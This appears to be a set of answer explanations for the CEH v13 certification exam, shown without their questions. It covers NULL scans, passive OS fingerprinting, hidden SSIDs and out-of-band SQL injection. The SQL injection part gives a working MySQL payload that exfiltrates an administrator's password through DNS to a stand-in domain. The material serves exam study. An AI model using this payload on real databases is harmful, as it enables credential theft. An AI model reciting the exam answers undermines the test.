Passed Exam Today 312-50v13

When a NULL scan is sent to a port on a UNIX-based system:

If the port is OPEN: The system does not respond at all.

If the port is CLOSED: The system responds with a RST packet.

This behavior is based on how the TCP stack processes unexpected packets.

From CEH v13 Courseware:

Module 3: Scanning Networks

Topic: Stealth Scanning Techniques → NULL Scan

CEH v13 Official Guide states:

“A NULL scan sends a TCP packet with no flags set. On systems following RFC 793 (like many Unix/Linux), open ports silently drop such packets (no response), while closed ports respond with a TCP RST.”

Incorrect Options:

A–E: Not standard responses for an open port in a NULL scan scenario.

An ‘out-of-band’ SQL Injection attack is a type of SQL injection where the attacker does not receive a response from the attacked application on the same communication channel but instead is able to cause the application to send data to a remote endpoint that they control1. This technique can be used to bypass input validation and pattern matching measures that are based on the application’s responses. The attacker can use various SQL functions or commands that trigger DNS or HTTP requests, such as load_file, copy, dbms_ldap, etc., depending on the SQL server type123. By concatenating the data they want to extract with a domain name they own, the attacker can receive the data via DNS or HTTP logs. For example, the attacker can inject the following SQL query to exfiltrate the password of the administrator user from a MySQL database:

SELECT load_file(CONCAT('\\\\',(SELECT password FROM users WHERE username='administrator'),'.example.com\\\\test.txt'))

This will cause the application to send a DNS request to the domain password.example.com, where password is the actual value of the administrator’s password1.

Passive OS fingerprinting involves observing traffic from a remote host and analyzing it to infer details about the operating system without actively sending packets or probes. This is useful in stealthy reconnaissance where avoiding detection is critical.

tcpdump is a packet analyzer that captures traffic in real time. By analyzing certain TCP/IP header fields such as TTL (Time-To-Live), window size, TCP options, and DF (Don't Fragment) flags, attackers can passively deduce the operating system of the target host.

CEH v13 Guide states:

“Passive fingerprinting tools like tcpdump and Wireshark allow the attacker to capture packets and analyze them for OS-specific traits, making it possible to identify the OS without sending packets to the target system.”

Reference – CEH v13 Study Guide:

Module 02: Footprinting and Reconnaissance, Section: “OS Fingerprinting Techniques”, Subsection: “Passive OS Fingerprinting”

Incorrect Options Explained:

A: nmap is primarily an active scanning tool (though it has limited passive capabilities).

C: tracert is used for tracing packet routes, not OS fingerprinting.

D: ping checks host availability and latency, not OS details.

‒‒‒‒‒‒‒‒‒‒‒‒‒‒‒

In CEH v13 Module 11: Hacking Wireless Networks, it is explained that disabling SSID broadcast only hides the SSID from casual scanning, not from determined attackers.

When a legitimate client connects to a hidden SSID, the SSID is included in the probe request and association packets, which can be easily sniffed using tools like Wireshark or Kismet.

Leaving authentication open adds no real protection.

Attackers can still capture traffic and use it to determine the SSID and connect to the access point.